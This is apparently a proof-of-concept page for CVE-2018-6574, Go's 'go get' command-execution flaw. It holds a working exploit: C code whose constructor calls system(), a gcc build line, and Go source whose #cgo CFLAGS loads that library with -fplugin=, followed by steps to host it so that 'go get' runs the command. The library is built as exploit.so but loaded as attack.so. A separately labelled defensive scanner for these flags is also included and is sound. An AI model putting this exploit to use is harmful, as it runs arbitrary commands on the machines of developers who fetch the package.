CVE-2018-6574 PoC — Google Go Security Vulnerability

Associated Vulnerability
Title: Google Go Security Vulnerability (CVE-2018-6574)
Description: Go before 1.8.7, Go 1.9.x before 1.9.4, and Go 1.10 pre-releases before Go 1.10rc2 allow "go get" remote command execution during source code build, by leveraging the gcc or clang plugin feature, because -fplugin= and -plugin= arguments were not blocked.
Readme
# CVE-2018-6574 POC

Exploit POC For CVE-2018-6574

## Compile

1. Create an exploit file with the following:
```c
#include<stdio.h>
#include<stdlib.h>

static void malicious() __attribute__((constructor));

void malicious() {
    system("COMMAND");
}
```
2. Compile it:
```bash
gcc -shared -o exploit.so -fPIC exploit.c
```
3. Finally, you need the Go code that will tell cgo to use your plugin:
```go
package main
// #cgo CFLAGS: -fplugin=./attack.so
// typedef int (*intFunc) ();
//
// int
// bridge_int_func(intFunc f)
// {
//      return f();
// }
//
// int fortytwo()
// {
//      return 42;
// }
import "C"
import "fmt"

func main() {
    f := C.intFunc(C.fortytwo)
    fmt.Println(int(C.bridge_int_func(f)))
    // Output: 42
}
```
4. Then host it in a GitHub repository and run `go get` against it to gain command execution:
```bash
go get github.com/your-repo/CVE-2018-6574-POC
```

## VERSION

- Go before 1.8.7
- Go 1.9.x before 1.9.4
- Go 1.10 pre-releases before Go 1.10rc2
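
A defender-side check for the flags this README relies on, as an added example that is not part of the original repository: it scans Go source for `#cgo` directives carrying `-fplugin=` or `-plugin=`, so fetched code can be reviewed before it is built with an affected toolchain. `Finding`, `ScanSource` and the sample input are names and data constructed for this illustration.

```go
package main

import (
	"fmt"
	"strings"
)

// Finding is one #cgo directive token that passes a plugin-loading argument.
type Finding struct {
	Line int    // 1-based line number in the scanned source
	Var  string // directive variable, e.g. CFLAGS or LDFLAGS
	Flag string // the offending token
}

// ScanSource inspects every "#cgo [constraints] VAR: flags" line in src.
// Flags are split on whitespace; quoting is not interpreted (a simplification).
func ScanSource(src string) []Finding {
	var out []Finding
	for i, line := range strings.Split(src, "\n") {
		// Directives sit in the comment above import "C": strip comment markers.
		text := strings.TrimSpace(strings.TrimLeft(strings.TrimSpace(line), "/*"))
		colon := strings.Index(text, ":")
		if colon < 0 {
			continue
		}
		head := strings.Fields(text[:colon])
		if len(head) < 2 || head[0] != "#cgo" {
			continue // ordinary code or comment, not a cgo directive
		}
		for _, tok := range strings.Fields(text[colon+1:]) {
			// The two argument forms named in the CVE description.
			if strings.Contains(tok, "-fplugin=") || strings.Contains(tok, "-plugin=") {
				out = append(out, Finding{i + 1, head[len(head)-1], tok})
			}
		}
	}
	return out
}

// sample is constructed input; only its first directive comes from the page.
const sample = "package main\n\n// #cgo CFLAGS: -fplugin=./attack.so\n// #cgo LDFLAGS: -lm\n" +
	"// #cgo linux LDFLAGS: -Wl,-plugin=./x.so\nimport \"C\"\n\nvar s = \"-fplugin=x: not a directive\"\n"

func main() {
	for _, f := range ScanSource(sample) {
		fmt.Printf("line %d: %s carries %s\n", f.Line, f.Var, f.Flag)
	}
}
```

A non-empty result means the package should not be built until the directive has been reviewed.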

## References

- https://nvd.nist.gov/vuln/detail/CVE-2018-6574
- http://blog.nsfocus.net/cve-2018-6574/
File Snapshot

[4.0K] /data/pocs/cc1348097b2c7b94cb552a90f8d398adc30f8991
├── [ 187] exploit.c
├── [ 16K] exploit.so
├── [ 334] main.go
└── [1.0K] README.md

0 directories, 4 files